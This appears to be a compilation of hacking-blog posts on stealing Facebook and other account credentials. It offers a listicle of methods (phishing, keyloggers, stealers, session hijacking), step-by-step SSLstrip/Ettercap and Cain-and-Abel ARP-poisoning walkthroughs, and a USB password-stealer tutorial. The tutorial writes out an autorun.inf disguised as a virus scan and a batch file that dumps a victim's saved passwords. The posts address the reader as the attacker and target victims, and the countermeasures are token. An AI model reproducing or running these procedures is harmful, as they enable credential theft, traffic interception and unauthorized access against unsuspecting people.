Top 10 Ways to Hack Facebook Accounts

Facebook is one of the most widely used social networking site with more than 750 million users, as a reason if which it has become the number 1 target of hackers, I have written a couple of post related to facebook hacking. In my previous post which related to facebook hacking and security 4 ways on How to hack facebook password, I mentioned the top methods which were used by hackers to hack facebook accounts, however lots of things have changed in 2011, Lots of methods have went outdated or have been patched up by facebook and lots of new methods have been introduced, So in this post I will write the top 10 methods how hackers can hack facebook accounts in 2010.

10 Ways How Hackers Can Hack Facebook Accounts In 2011

So here are the top 10 methods which have been the most popular in 2011:

1. Facebook Phishing 

Phishing still is the most popular attack vector used for hacking facebook accounts, There are variety of methods to carry out phishing attack, In a simple phishing attacks a hacker creates a fake login page which exactly looks like the real facebook page and then asks the victim to login into that page, Once the victim logins through the fake page the victims "Email Address" and "Password" is stored in to a text file, The hacker then downloads the text file and get's his hands on the victims credentials.

I have explained the step by step phishing process in my post below:

• How To Hack Facebook Password

2. Keylogging 

Keylogging, according to me is the easiest way to hack a facebook password, Keylogging sometimes can be so dangerous that even a person with good knowledge of computers can fall for it. A keylogger is basically a small program which once is installed on victims computer will record every thing which victim types on his/her computer. The logs are then send back to the attacker by either FTP or directly to hackers email address. I have dedicated a half of my newsest book "An introduction to keyloggers, RATS And Malware" to this topic.

3. Stealers 

Almost 80% percent people use stored passwords in their browser to access the facebook, This is is quite convenient but can sometimes be extremely dangerous, Stealers are software's specially designed to capture the saved passwords stored in the victims browser, Stealers once FUD can be extremely powerful. If you want to how stealers work and how you can set up your own one?, Kindly refer the book above.

4. Session Hijacking

Session Hijacking can be often very dangerous if you are accessing Facebook on a http:// connection, In a Session Hijacking attack a hacker steals the victims browser cookie which is used to authenticate a user on a website and uses to it to access victims account, Session hijacking is widely used on Lan's. I have already written a three part series on How session hijacking works? and also a separate post on Facebook session hijacking.

5. Sidejacking With Firesheep

Sidejacking attack went common in late 2010, however it's still popular now a days, Firesheep is widely used to carry out sidejacking attacks, Firesheep only works when the attacker and victim is on the same wifi network. A sidejacking attack is basically another name for http session hijacking, but it's more targeted towards wifi users.

To know more about sidejacking attack and firesheep, read the post mentioned below:

• Firesheep Makes Facebook Hacking Easy

6. Mobile Phone Hacking

Millions of Facebook users access Facebook through their mobile phones. In case the hacker can gain access to the victims mobile phone then he can probably gain access to his/her Facebook account. Their are lots of Mobile Spying softwares used to monitor a Cellphone.

The most popular Mobile Phone Spying softwares are:

1. Mobile Spy 
2. Spy Phone Gold

7. DNS Spoofing 


If both the victim and attacker are on the same network, an attacker can use a DNS spoofing attack and change the original facebook.com page to his own fake page and hence can get access to victims facebook account.

8. USB Hacking 

If an attacker has physical access to your computer, he could just insert a USB programmed with a function to automatically extract saved passwords in the browser, I have also posted related to this attack which you can read by accessing the link below:

• Usb password stealer To Hack Facebook Passwords

9. Man In the Middle Attacks


If the victim and attacker are on the same lan and on a switch based network, A hacker can place himself b/w the client and the server or he could also act as a default gateway and hence capturing all the traffic in between, ARP Poisoning which is the other name for man in the middle attacks is a very broad topic and is beyond the scope of this article, We have written a couple of articles on man in the middle attacks which canb be accessed from the links mentioned below:

• Man In the Middle Attacks With SSL Strip

If you are really interested in learning how man in the middle attacks, you can view the presentation below by oxid.it.

10. Botnets 

Botnets are not commonly used for hacking facebook accounts, because of it's high setup costs, They are used to carry more advanced attacks, A botnet is basically a collection of compromised computer, The infection process is same as the keylogging, however a botnet gives you, additional options in for carrying out attacks with the compromised computer. Some of the most popular botnets include Spyeye and Zeus.


Facebook Hacking Course

Facebook hacking course is a facebook security course created by me, which tells you exactly how how hackers can compromise your facebook accounts and what can you do to protect your facebook accounts from getting hacked.

Click here to get access to the course

Hope you have enjoyed reading the post as much i did while writing.

Note: Copying or reproducing this article is strictly prohibited and will lead to certain consequences, If you are reproducing or copying this article, make sure that you give a proper credit.

Man In The Middle Attack - SSL Hacking

One of the most successful way of gaining information such as passwords,user ids etc in LAN (local area network) is through man in the middle attacks . I will not be going to deep into Man in the middle attacks, but in simple words it can be explained as attacker or a hacker listening to all the information sent in between the client and the server .To prevent these kind of attacks Email providers started using Hypertext Transfer Protocol Secure (HTTPS) It is a combination of the Hypertext Transfer Protocol(HTTP) with SSL (Secure socket layer )protocol to provide encrypted communication between the client and the server .So when a hacker caries out a Mimt attack the victim is cautioned with a invalid SSL Certificate

In this tutorial I will teach how to carry out a successful Mitm attack 

Concept :-

We Know that HTTP (Hypertext Transfer Protocol )simply sends all the information through plain text .So if we make the victim use HTTP instead of HTTPS to connect sites like Gmail , Pay pal. we will be able to carry out a successful Mitm attack with out causing any suspicion To do this we are going to use a tool called SSL strip

Read More: What is SSL(Secure Socket Layer) 

Thing we Need 

1. SSL strip: You can search Google for SSL strip it comes both in windows and Linux versions . I will be using the windows version in this tutorial 

2. Ettercap to carry out mitm attacks

Demonstration :- 

1. Open SSL strip and fill in all the required information for arpsoof, network ,ssl strip, change data .If you don’t know what to enter simply click auto check . remember to check if HTTPS to HTTP is included in Change data , finally click ok

2. Now select the victim’s IP and click open 

3. Now open ettercap go to sniff -unsniffed sniffing and select your network interface and click ok 

4. Now select hosts-scan hosts .Once scanning is completed .Open host list from hosts tab .Now select the IP address of the router as target 1 and the victims IP as target 2

5. Now select mitm-arp poisoning and click ok as shown

6. Finally select start-start sniffing .Now when the victim logs into gmail he will be using HTTPand not HTTPS Hence we are able to get the User id ,passwords as shown below

Counter measures: 

1. whenever you perform an online transaction such as Credit card payment, Bank login or Email login always ensure that you Use HTTPS 

2. Always check the SSL certificate before doing an online transaction

What is Secure Sockets Layer (SSL)

You might have heard some times that not to give your password or credit card information or any other sensitive information on public computers or on Msn, yahoo etc chats.The reason why you might have heard that the Hackers have some ways to you would have probably heard that hackers have a way to steal your your credit card numbers , passwords etc.
A hacker can use different types of attacks such as Packet sniffing or ARP Poisoning to steal your sensitive information

Secure Sockets Layer (SSL) is the most widely used technology for creating a secure communication between the web client and the web server. You must be familiar withhttp:// protocol and https:// protocol, You might be wondering what they mean. HTTP protocol is used for standard communication between the Web server and the client. HTTPS is used for a secure communication.

Cryptography

If two users want to have a secure communication they can also use cryptography to accomplish it

For example: 

TFDVSF=Encrypted Text

SECURE= Decrypted Text

You might be wondering how i Decrypted it, Here i have used Algorithm=+ for the communication and the key is "1", What comes after S is T so as you can see that S is converted into T, What comes After E is F to letter E from the word secure if converted into F and so on, To help you understand this more better I am adding a Video

So If the hacker starts sniffing from between he will get Encrypted text and as the Hacker does not know the keys so he cant decrypt it, but if the attacker or hacker is sniffing from the starting point so he will get the key and can easily Decrypt the data

Standard Communication VS Secure communication

Suppose there exists two communication parties A (client) and B (server)

Standard communication(HTTP)

When A will send information to B it will be in unencrypted manner, this is acceptable if A is not sharing Confidential information, but if A is sending sensitive information say "Password" it will also be in unencrypted form, If a hacker starts sniffing the communication so he will get the password.This scenario is illustrated using the following figure

Secure communication(HTTPS)

In a secure communication i.e. HTTPS the conversation between A and B happens to be in a safe tunnel, The information which a user A sends to B will be in encrypted form so even if a hacker gets unauthorized access to the conversion he will receive the encrypted password (“xz54p6kd“) and not the original password.This scenario is illustrated using the following figure

How is HTTPS implemented?

A HTTPS protocol can be implemented by using Secure Sockets Layer (SSL), A website can implement HTTPS by purchasing SSL certificate.

Which websites need SSL Certificate?

The websites where a private conversation is occurred, Websites related to online transactions or other sensitive information needs to be protected needs to SSL Certificate 

How to identify a Secure Connection?
In Internet Explorer and google chrome, you will see a lock icon  in the Security Status bar. The Security Status bar is located on the right side of the Address bar. You can click the lock to view the identity of the website.

If you are making an online transaction through Credit card or any other means you should check if https:// secured communication is enabled.

How to implement an ARP poisoning attack

The concept behind this is simple. ARP is the protocol that maintains network devices tables up-to-date by associating an IP address with a MAC address. The problem with ARP is that it doesn’t really care about who answered, it will gladly update the tables from whoever says so. Most of the time, it won’t even ask. So the idea behind the attack, is to send the client an ARP answer saying “hey, I’m the gateway, send stuff to me” and a second ARP answer to the real gateway saying “hey there, I’m this guy, send me his stuff”. Then you just have to relay the packets between the victim and the gateway.Those schemas are more simply to understand

In Linux, the rerouting can be done using the following iptables commands:

iptables -t nat -A PREROUTING -i  -p tcp –dport  -j REDIRECT –to-port 

iptables -t nat -D PREROUTING -i  -p tcp –dport  -j REDIRECT –to-port 

ARP Spoofing/poising Animation

The attacker is constently sending false ARP messages to the victim causing it to update its ARP table. When you ready to send Ping, watch closley where the ping goes.

How to implement an ARP poisoning attack?

What you will need:

• A laptop.

• Cain and able. Download it from, www.oxid.it/index.html

• A network to sniff.

Now onto how to do this:

1) Download and install cain and able.

2) Set your laptop up and steal an ethernet connection from a nearby computer on the network. Plug the Ethernet cable in. You are now connected. With no restrictions on what you can run.

3) Start cain and able.

4) Now click on the sniffer tab. Now notice the two symbols – the one that looks the same as the one on the sniffer tab and the one that looks like a nuclear sign.

5) Mouse over them and they will tell you that one starts the sniffer and the other starts arp poisoning.

6) Now click on configure -> click on the arp tab and make sure that you are using your real ip and mac address, if you don’t you wont get any hosts or be able to arp poision.

7) Now start the sniffer and press the blue plus sign. This will let you scan for hosts in your subnet. 8) Now go back to configure and select use a spoofed ip and mac address. Now type an ip from your sub net but the last bit must be numbers that are unused so the network doesn’t get confused.

8) Select all the hosts you find and right click and go resolve host name. Now try to find the router, it will usually stand out easily. The router probably wont have a name as well as being a different brand from everything else and have a really low or really high ip address so you should spot it easily.

9) Now click on the arp tab at the bottom of the sniffer window. Click on the top table part and click the blue plus sign again. This brings up a window that allows you to select the ip addresses that you want to arp poison the first one you select should be the router and in the second box select any computers you want to listen to.

10) Click ok. Click the start arp button. You are now listening between the router and as many computers as you selected.

11) Watch as the routed packets role in. Select the password tab at the bottom of the screen and watch the passwords appear.

12) Any password hashes can be sent to the cracker and broken form there but that isn’t going to be covered in this article. I am sure you can work that out or may be I shall post it later. 

Usb Password Stealer

As we know that windows stores most of its passwords on daily basis , Such as Msn messenger passwords,Yahoo passwords,Myspace passwords etc.Most of people have lack of time and they had just asked their Browser/windows to save their passwords,As we know that there are many tools to recover Saved passwords,so in this article i will explain you on How to made a USB passwords stealer and steal saved passwords.

Things you will need?

MessenPass - MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications:

Mail PassView - Mail PassView is a small password-recovery tool that reveals the passwords and other account details for Outlook express,windows mail,POP3 etc

IE Passview - IE passview is a small program that helps us view stored passwords in Internet explorer.
Protected storage pass viewer(PSPV) -  Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer.


Password Fox - Password fox is a small program used to view Stored passwords in Mozilla Firefox.


Now here is a step by step tutorial to create a USB password stealer to steal saved passwords:

Note:Kindly disable your antivirus before performing these steps

1.First of all download all 5 tools and copy the executables (.exe( files in your USB  i.e. Copy the files  mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.


2. Create a new Notepad and write the following text into it

[autorun]

open=launch.bat

ACTION= Perform a Virus Scan

save the Notepad and rename it from


New Text Document.txt to autorun.inf


Now copy the autorun.inf file onto your USB pendrive.


3. Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

save the Notepad and rename it from


New Text Document.txt to launch.bat


Copy the launch.bat file also to your USB drive.


Now your USB Password stealer is ready all you have to do is insert it in your victims computer and  a popup will appear, in the popup window select the option (Launch virus scan) as soon as you will click it the following window will appear.

After this you can see saved password in .TXT files